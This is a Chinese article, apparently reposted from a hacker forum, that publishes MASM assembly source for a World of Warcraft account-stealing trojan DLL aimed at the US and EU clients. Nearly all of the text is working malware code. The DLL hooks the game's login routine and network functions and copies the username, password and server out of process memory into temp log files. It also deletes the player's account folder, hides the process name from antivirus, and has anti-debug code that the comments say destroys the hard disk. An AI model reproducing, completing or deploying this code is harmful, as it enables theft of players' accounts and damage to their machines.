随着暴雪的网络游戏《魔兽世界》风靡全球,专门针对这一款网络游戏的盗号木马也层出不穷。近日,有技术爱好者分析了针对美服、欧服的魔兽世界盗号木马,并公布了其源代码。该代码针对的是目前最新游戏版本v2.4.3.8606。
代码如下:
作者:asm (MSN:asm32@live.cn)
信息来源:邪恶八进制
对应游戏版本v2.4.3.8606。这个只是核心代码,而非完整代码,通过调式完全可以写出美服跟欧服的WOW木马来。
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
; Programmed by asm, MSN:asm32@live.cn ;
; WOWGameMaker For WOW_MF_OF ;
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
;0041DAEA |. 5E pop esi <-------------特征码位置+12=断点位置
;0041DAEB |. 33CD xor ecx, ebp
;0041DAED |. 5B pop ebx
;0041DAEE |. E8 E7CAFEFF call 0040A5DA
;0041DAF3 |. 8BE5 mov esp, ebp
;0041DAF5 |. 5D pop ebp <-------------断点位置
;0041DAF6 . C2 0400 retn 4 <-------------ret执行后,游戏会跳转到005B55B4h这里执行。因此在木马里要
;搜索这个地址得特征码从而得到通用得地址,而不是直接采用硬编码 = =。再得到通用得地址后执行 mov eax,hJmpEip/jmp eax即可
;szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h
;005B55B4 8B4D FC mov ecx, dword ptr [ebp-4] <-----------------得到要跳转的地址
;005B55B7 5F pop edi
;005B55B8 5E pop esi
;005B55B9 |. 33CD xor ecx, ebp
;005B55BB |. 5B pop ebx
;005B55BC |. E8 1950E5FF call 0040A5DA
;005B55C1 8BE5 mov esp, ebp
;szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h
;----------------------------------------------------------------------------------------------------------------
.486
.model flat,stdcall
option casemap:none
include debug.inc
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
include comctl32.inc
includelib comctl32.lib
include psapi.inc
includelib psapi.lib
IncludeLib Masm32.lib
Include Masm32.inc
include Shlwapi.inc
includelib Shlwapi.lib
include shell32.inc
includelib shell32.lib
include macros.inc
includelib mylib.lib
include wininet.inc
includelib wininet.lib
HOOKAPI struct
a byte 0B8h
PMyapi DWORD 0
d BYTE 0FFh
e BYTE 0E0h
HOOKAPI ends
MODULEINFO struct
lpBaseOfDll dword 0
SizeOfImage dword 0
EntryPoint dword 0
MODULEINFO ends
F_STOP equ 0002h
;子程序声明
HookApi proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
HookApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
HookApiRecv proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
WriteApi proto :DWORD ,:DWORD,:DWORD,:DWORD
WriteApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD
MyHookFunToGetUserAndPass proto :DWORD ,:DWORD,:DWORD
MyConnect proto :DWORD ,:DWORD,:DWORD;,:DWORD
MyRecv proto :DWORD ,:DWORD,:DWORD,:DWORD
GetApi proto :DWORD,:DWORD
BakDll proto :DWORD,:DWORD
AntiFileToRun proto c :DWORD
BytePos proto c :DWORD,:DWORD,:DWORD,:DWORD,:DWORD
LoadModuleEx proto c :DWORD
GetModuleImageSize proto c :DWORD
CaleHookPointerWOW proto c
ExtractFileName proto c :DWORD
ExtractFilePath proto c :DWORD
;已初始化数据
.data
hInstance dd 0
WProcess dd 0
Papi1 DWORD ?
Papi2 DWORD ?
Papi3 DWORD ?
WritBak1 HOOKAPI <>
WritBak2 HOOKAPI <>
ApiBak1 db 10 dup(?)
ApiBak2 db 10 dup(?)
DllName1 db "ws2_32.dll",0
ApiName1 db "connect",0
ApiName2 db "recv",0
ApiName3 db "hook",0
szWowprocess db "g&mpm",0 ;wow.exe加密
Dllbase1 DWORD ?
NowDllbase1 DWORD ?
NowDllbase2 DWORD ?
dwTemp dd ?
hAdress dd ?
;Dllbase2 DWORD ?
;NowDllbase2 DWORD ?
hRecvBak dd ?
hRecv dd ?
szJmp db 0C2h,04h,00h,0cch,0cch,0cch,0cch ;恢复
szJmpRecv db 8Bh,0FFh,55h,8Bh,0ECh,83h,0ECh, 10h,53h,33h,0DBh,81h,3Dh, 28h,40h,0A3h,71h,56h,0Fh,84h, 5Eh,50h,00h,00h
szWOWFmt db "wowu=%s&wowp=%s&wowf=%s",13,10,13,10,0
szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h
szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h
szEbpEnter db 6Ah, 40h, 5Ah,01h,5Ch,0FAh, 12h,00h,0C7h, 16h,42h
.data?
hHook dd ?
hHook1 dd ?
hPid dd ?
;hHwnd dd ?
WOWuser db 50 dup(?)
WOWpwd db 50 dup(?)
WOWpwd1 db 50 dup(?)
WOWpwd2 db 50 dup(?)
szText db 256 dup(?)
szText1 db 256 dup(?)
@szValue db 256 dup(?)
szServer db 256 dup(?)
szUserJiaoSe db 256 dup(?)
;程序代码段
hQQ dd ?
hWnd dd ?
QQpid dd ?
hecx dd ?
hedx dd ?
hesp dd ?
hebp dd ?
hesi dd ?
hebx dd ?
hedi dd ?
szWoWBak db 256 dup(?)
szWoWBak1 db 256 dup(?)
ThreadId6 DWORD ?
szLevel db 20 dup(?)
szFileName db 200 dup(?)
szSendData db 256 dup(?)
TempPath db 256 dup(?)
hWnd1 dd ?
hEnter dd ?
hExeModule dd ?
dwModuleSize dd ?
hUserPassRealCode dd ?
hICout dd ?
hJmpEip dd ?
WOWServer db 256 dup(?)
szFu db 125 dup(?)
stStartUp STARTUPINFO <>
stProcInfo PROCESS_INFORMATION <>
@dwSize dd ?
szFind WIN32_FIND_DATA<?>
szSend1 db 256 dup(?)
szSend2 db 256 dup(?)
hRecv1 DD ?
hAddress dd ?
szPlayerName db 260 dup (?)
szPlayerName1 db 260 dup (?)
hRecv2 dd ?
hRecv3 dd ?
hSend dd ?
szBakSend db 20 dup(?)
dwFolderCount dd ?
dwOption dd ?
.code
include inNTSAPISHELL.asm
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;每次启动都要把目录先跟文件先清空。这样可以保证获取的等级是对应游戏账号得。
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_FindFileToDel proc _lpszPath
local @stFindFile:WIN32_FIND_DATA
local @hFindFile
local @szPath[MAX_PATH]:byte ;用来存放“路径”
local @szSearch[MAX_PATH]:byte ;用来存放“路径*.*”
local @szFindFile[MAX_PATH]:byte ;用来存放“路径找到的文件”
pushad
invoke lstrcpy,addr @szPath,_lpszPath
;********************************************************************
; 在路径后面加上*.*
;********************************************************************
@@:
invoke lstrlen,addr @szPath
lea esi,@szPath
add esi,eax
xor eax,eax
mov al,''
.if byte ptr [esi-1] != al
mov word ptr [esi],ax
.endif
invoke lstrcpy,addr @szSearch,addr @szPath
invoke lstrcat,addr @szSearch,CTXT("*.*")
;********************************************************************
; 寻找文件
;********************************************************************
invoke FindFirstFile,addr @szSearch,addr @stFindFile
.if eax != INVALID_HANDLE_VALUE
mov @hFindFile,eax
.repeat
invoke lstrcpy,addr @szFindFile,addr @szPath
invoke lstrcat,addr @szFindFile,addr @stFindFile.cFileName
.if @stFindFile.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY
.if @stFindFile.cFileName != '.'
inc dwFolderCount
invoke _FindFileToDel,addr @szFindFile ;继续找,从最后一个目录删除才可以。顺序不能调换
invoke RemoveDirectory,addr @szFindFile
.endif
.else
invoke DeleteFile,addr @szFindFile ;是文件就删除
.endif
invoke FindNextFile,@hFindFile,addr @stFindFile
.until (eax == FALSE) || (dwOption & F_STOP)
invoke FindClose,@hFindFile
.endif
popad
ret
_FindFileToDel endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;权限提升
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_EnablePrivilege proc szPriv:DWORD, bFlags:DWORD
LOCAL hToken
LOCAL tkp : TOKEN_PRIVILEGES
invoke GetCurrentProcess
mov edx, eax
invoke OpenProcessToken, edx, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken
invoke LookupPrivilegeValue, NULL, szPriv, addr tkp.Privileges.Luid
mov tkp.PrivilegeCount, 1
xor eax, eax
.if bFlags
mov eax, SE_PRIVILEGE_ENABLED
.endif
mov tkp.Privileges.Attributes, eax
invoke AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0
push eax
invoke CloseHandle, hToken
pop eax
ret
_EnablePrivilege endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_WriteFile proc _lpbuff:DWORD,lpfilepath:DWORD
local @dwWritebyte1:DWORD
local @hFiledaka,@dwWritedaka
pushad
invoke CreateFile,lpfilepath,GENERIC_WRITE or GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,
0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov @hFiledaka,eax
invoke SetFilePointer,@hFiledaka,0,NULL,FILE_END
invoke lstrlen,_lpbuff
mov @dwWritedaka,eax
invoke WriteFile,@hFiledaka,_lpbuff,@dwWritedaka,addr @dwWritebyte1,NULL
invoke CloseHandle,@hFiledaka
popad
ret
_WriteFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;DLL入口点
DllEntry proc hInst:HINSTANCE, reason:DWORD, reserved1:DWORD
.if reason==DLL_PROCESS_ATTACH ;当DLL加载时产生此事件
push hInst
pop hInstance
invoke RtlZeroMemory,addr szText,256
invoke GetModuleFileName,NULL,addr szText,256
invoke ExtractFileName,addr szText
invoke wsprintf,addr szFileName,CTXT("%s"),eax
invoke EncryptString,addr szWowprocess ;解密wow.exe过麦咖啡
invoke CompareString,LOCALE_USER_DEFAULT, NORM_IGNORECASE,addr szFileName, -1,addr szWowprocess, -1;如果是wow,则hook
.if eax == 2
invoke OutputDebugString,CTXT("found....")
invoke LoadModuleEx,NULL
mov hExeModule,eax
invoke GetModuleImageSize,hExeModule
mov dwModuleSize,eax
invoke BytePos,hExeModule, dwModuleSize,addr szUserPassRealCode,sizeof szUserPassRealCode,hICout ;搜索特征码的位置
.if eax == -1
invoke OutputDebugString,CTXT("search error")
.endif
mov hUserPassRealCode,eax
mov eax,hExeModule
add hUserPassRealCode,eax ;特征码的位置
add hUserPassRealCode,12 ;得到实际断点位置
invoke BytePos,hExeModule, dwModuleSize,addr szJmpEip,sizeof szJmpEip,hICout ;要跳转的位置。
.if eax == -1
invoke OutputDebugString,CTXT("jmp eip code search error")
.endif
mov hJmpEip,eax
mov eax,hExeModule
add hJmpEip,eax
invoke GetCurrentProcess ;取进程伪句柄
mov WProcess ,eax
invoke BakDll,addr DllName1,addr Dllbase1 ;备份"kernel32.dll"
mov NowDllbase1,eax
invoke HookApi1,addr DllName1,addr ApiName3,addr Papi1,addr MyHookFunToGetUserAndPass,addr ApiBak1,addr WritBak1 ;HOOK 0041DAEE 这个地址得到用户跟密码
invoke HookApi,addr DllName1,addr ApiName1,addr Papi2,addr MyConnect,addr ApiBak2,addr WritBak2 ;HOOK connect
;invoke HookApiRecv,addr DllName1,addr ApiName2,addr Papi3,addr MyRecv,addr ApiBak2,addr WritBak2 ;HOOK recv
invoke GetApi,addr DllName1,CTXT("send") ;得到send函数地址
mov hSend,eax
invoke ReadProcessMemory,WProcess,hSend,addr szBakSend,20,NULL ;备份send函数20字节
call kernel32_IsDebuggerPresent ;反调式。如果发现dll被调式,则摧毁硬盘。
invoke CreateThread,NULL,0,addr _Anti,NULL,0,addr ThreadId
invoke CreateThread,NULL,0,addr _GetWowGameLevel,NULL,0,addr ThreadId1
.endif
.endif
.if reason==DLL_PROCESS_DETACH ;当卸载的时候
.endif
mov eax,TRUE
ret
DllEntry Endp
;****************************************************************
GetMsgProc proc nCode:DWORD,wParam:DWORD,lParam:DWORD
invoke CallNextHookEx,hHook,nCode,wParam,lParam
mov eax,TRUE
ret
GetMsgProc endp
;---------------------------------------------------------------------
InstallHook proc dwProcessId:dword
push dwProcessId
pop hPid
;invoke SetWindowsHookEx,WH_GETMESSAGE,addr GetMsgProc,hInstance,NULL
mov hHook,eax
ret
InstallHook endp
UninstallHook proc
invoke UnhookWindowsHookEx,hHook
push eax
invoke WriteApi,WProcess,Papi1, addr ApiBak1 ,8 ;还原API
pop eax
ret
UninstallHook endp
;*****************************************************************
GetApi proc DllNameAddress:DWORD,ApiNameAddress:DWORD
invoke GetModuleHandle,DllNameAddress ;取DLL模块句柄
.if eax==NULL
invoke LoadLibrary ,DllNameAddress ;加载DLL
.endif
invoke GetProcAddress,eax,ApiNameAddress ;取API地址
mov hAdress,eax
mov eax,hAdress
ret
GetApi endp
;*********************************下面是核心部分*****************
HookApiRecv proc DllName:dword,ApiName:dword ,Papi:dword , MyApi:dword ,ApiBak:dword ,WritBak:dword
LOCAL ApiDz
invoke GetApi,DllName,ApiName ;取API地址
.if eax==0
ret
.endif
mov hAdress,eax
invoke lstrcmp,ApiName,CTXT("recv");如果是recv,则hook的地址是 recv的地址。
.if eax == NULL ;connect ?
push hAdress
pop ApiDz ;下面几行是保存API地址
invoke wsprintf,addr szText,CTXT("Recv address:0x%x"),ApiDz
invoke OutputDebugString,addr szText
.endif
mov eax,Papi
assume eax:ptr
push ApiDz
pop [eax]
invoke ReadProcessMemory,WProcess,ApiDz,ApiBak,8,NULL ;备份原API的前8字节
.if eax==0
ret
.endif
mov eax,WritBak
assume eax:ptr HOOKAPI
push MyApi
pop [eax].PMyapi ;要替代API的函数地址
.if [eax].PMyapi == 0
mov eax,0
ret
.endif
invoke WriteApi,WProcess,ApiDz, WritBak ,size HOOKAPI ;HOOK API
ret
HookApiRecv endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
HookApi proc DllName:dword,ApiName:dword ,Papi:dword , MyApi:dword ,ApiBak:dword ,WritBak:dword
LOCAL ApiDz
invoke GetApi,DllName,ApiName ;取API地址
.if eax==0
ret
.endif
mov hAdress,eax
invoke lstrcmp,ApiName,CTXT("connect")
.if eax == NULL ;connect ?
push hAdress
pop ApiDz ;下面几行是保存API地址
invoke wsprintf,addr szText,CTXT("connect address:0x%x"),ApiDz
invoke OutputDebugString,addr szText
.endif
mov eax,Papi
assume eax:ptr
push ApiDz
pop [eax]
invoke ReadProcessMemory,WProcess,ApiDz,ApiBak,8,NULL ;备份原API的前8字节
.if eax==0
ret
.endif
mov eax,WritBak
assume eax:ptr HOOKAPI
push MyApi
pop [eax].PMyapi ;要替代API的函数地址
.if [eax].PMyapi == 0
mov eax,0
ret
.endif
invoke WriteApi,WProcess,ApiDz, WritBak ,size HOOKAPI ;HOOK API
ret
HookApi endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
HookApi1 proc DllName:dword,ApiName:dword ,Papi:dword , MyApi:dword ,ApiBak:dword ,WritBak:dword
LOCAL ApiDz
invoke lstrcmp,ApiName,CTXT("hook")
.if eax == NULL
mov eax,hUserPassRealCode
mov ApiDz,eax
.endif
invoke wsprintf,addr szText,CTXT("myhook address:0x%x"),ApiDz
invoke OutputDebugString,addr szText
mov eax,Papi
assume eax:ptr
push ApiDz
pop [eax]
invoke ReadProcessMemory,WProcess,ApiDz,ApiBak,8,NULL ;备份原API的前8字节
.if eax==0
ret
.endif
mov eax,WritBak
assume eax:ptr HOOKAPI
push MyApi
pop [eax].PMyapi ;要替代API的函数地址
.if [eax].PMyapi == 0
mov eax,0
ret
.endif
invoke WriteApi,WProcess,ApiDz, WritBak ,size HOOKAPI ;HOOK API
ret
HookApi1 endp
;------------------------------------------------------------------
;WriteApi修改内存
;------------------------------------------------------------------
WriteApi proc Process:DWORD ,Papi:DWORD,Ptype:DWORD,Psize:DWORD
LOCAL mbi:MEMORY_BASIC_INFORMATION
LOCAL msize:DWORD
;返回页面虚拟信息
invoke VirtualQueryEx,Process, Papi,addr mbi,SIZEOF MEMORY_BASIC_INFORMATION
;修改为可读写模式
invoke VirtualProtectEx,Process, mbi.BaseAddress,8h,PAGE_EXECUTE_READWRITE,addr mbi.Protect
;开始写内存
invoke WriteProcessMemory,Process, Papi, Ptype,Psize ,NULL
PUSH eax
;改回只读模式
invoke VirtualProtectEx,Process,mbi.BaseAddress,8h,PAGE_EXECUTE_READ,addr mbi.Protect
pop eax
ret
WriteApi endp
;------------------------------------------------------------------
;hook掉Connect函数
;------------------------------------------------------------------
MyRecv proc dwDesiredAccess:DWORD ,bInheritHandle:DWORD ,dwProcessId:DWORD, Flg:DWORD
LOCAL NowApiBase
mov eax,Papi3 ;hook新函数,这里要声明
sub eax,Dllbase1
add eax,NowDllbase1
mov NowApiBase,eax
push Flg
push dwProcessId
push bInheritHandle
push dwDesiredAccess
call NowApiBase
ret
MyRecv endp
;*******************************************************************
MyConnect proc dwDesiredAccess:DWORD ,bInheritHandle:DWORD ,dwProcessId:DWORD;, Flg:DWORD
LOCAL NowApiBase
mov eax,Papi2
sub eax,Dllbase1
add eax,NowDllbase1
mov NowApiBase,eax
INVOKE RtlZeroMemory,ADDR szText1,SIZEOF szText1
INVOKE wsprintf,addr szText1,CTXT("connect inCunt:%d"),hRecv
invoke OutputDebugString,addr szText1
.if hRecv1 == 1 ;断connect函数是为了防止第一次输入错误密码再次输入的时候截不到的问题。再次调用connect的时候,就说明再次输入密码,因此要再次hook。也就是错误密码不被写入
invoke HookApi1,addr DllName1,addr ApiName3,addr Papi1,addr MyHookFunToGetUserAndPass,addr ApiBak1,addr WritBak1 ;HOOK 0041DAEE 这个地址得到用户跟密码
mov hRecv1,0
.endif
push dwProcessId
push bInheritHandle
push dwDesiredAccess
call NowApiBase
ret
MyConnect endp
;------------------------------------------------------------------
;获取密码函数
;------------------------------------------------------------------
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
; Programmed by asm, MSN:asm32@live.cn ;
; WOWGameMaker For WOW_MF_OF ;
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
MyHookFunToGetUserAndPass proc dwDesiredAccess:DWORD ,bInheritHandle:DWORD ,dwProcessId:DWORD
local NowApiBase
local @dwSize1
LOCAL finddata:WIN32_FIND_DATA
LOCAL finddata1:WIN32_FIND_DATA
local hFindFile,hFindFile1
invoke RtlZeroMemory,addr WOWpwd,sizeof WOWpwd
invoke ReadProcessMemory,WProcess,ebx,addr WOWpwd,sizeof WOWpwd,NULL
invoke RtlZeroMemory,addr WOWuser,sizeof WOWuser
invoke ReadProcessMemory,WProcess,edi,addr WOWuser,sizeof WOWuser,NULL
invoke ReadProcessMemory,WProcess,0088F9C8h,addr WOWServer,sizeof WOWServer,NULL
invoke RtlZeroMemory,addr TempPath,256
invoke GetTempPath,256,addr TempPath
invoke lstrcat,addr TempPath,CTXT("fmt.log")
invoke DeleteFile,addr TempPath
invoke RtlZeroMemory,addr szSendData,256
invoke wsprintf,addr szSendData,addr szWOWFmt,addr WOWuser,addr WOWpwd,addr WOWServer
invoke _WriteFile,addr szSendData,addr TempPath
invoke RtlZeroMemory,addr TempPath,256
invoke GetTempPath,256,addr TempPath
invoke lstrcat,addr TempPath,CTXT("fmttemp.log")
invoke DeleteFile,addr TempPath
invoke _WriteFile,addr WOWuser,addr TempPath
mov @dwSize,sizeof @szValue
invoke _RegQueryValue,CTXT("SOFTWAREBlizzard EntertainmentWorld of Warcraft"),CTXT("InstallPath"),addr @szValue,addr @dwSize,CTXT("REG_SZ") ;得到WOW安装路径
invoke lstrcat,addr @szValue,CTXT("WTFAccount")
invoke lstrcat,addr @szValue,addr WOWuser
invoke _FindFileToDel,addr @szValue ;清空当前用户下的所有文件跟子目录
invoke WriteProcessMemory,WProcess,hUserPassRealCode,addr szJmp,7,addr dwTemp
MOV hRecv1,1
invoke WriteProcessMemory,WProcess,hSend,addr szBakSend,20,NULL ;恢复send函数20字节
add ebp,5ch
mov eax,hJmpEip
jmp eax
ret
MyHookFunToGetUserAndPass endp
;------------------------------------------------------------------
;备份dll函数
;------------------------------------------------------------------
BakDll proc DllName:DWORD,Dllbase:DWORD
LOCAL ModuleHwnd,hMainHeap,lpBuffer
LOCAL ModuleInformation: MODULEINFO
invoke GetModuleHandle,DllName
mov ModuleHwnd,eax
.if ModuleHwnd==0
ret
.endif
invoke GetModuleInformation,WProcess,ModuleHwnd,addr ModuleInformation,size MODULEINFO
.if eax ==0
jmp UninstallHook
ret
.endif
;原DLL的基地址
mov eax,Dllbase
assume eax:ptr
push ModuleInformation.lpBaseOfDll
pop [eax]
invoke VirtualAlloc, 0,ModuleInformation.SizeOfImage,4096,PAGE_EXECUTE_READWRITE
mov lpBuffer,eax
.if lpBuffer==0
jmp UninstallHook
ret
.endif
;备份DLL
invoke WriteProcessMemory,WProcess,lpBuffer, ModuleInformation.lpBaseOfDll,ModuleInformation.SizeOfImage,0
.if eax==0
jmp UninstallHook
ret
.endif
mov eax,lpBuffer
ret
BakDll endp
;*******************************************************************
End DllEntry
网友评论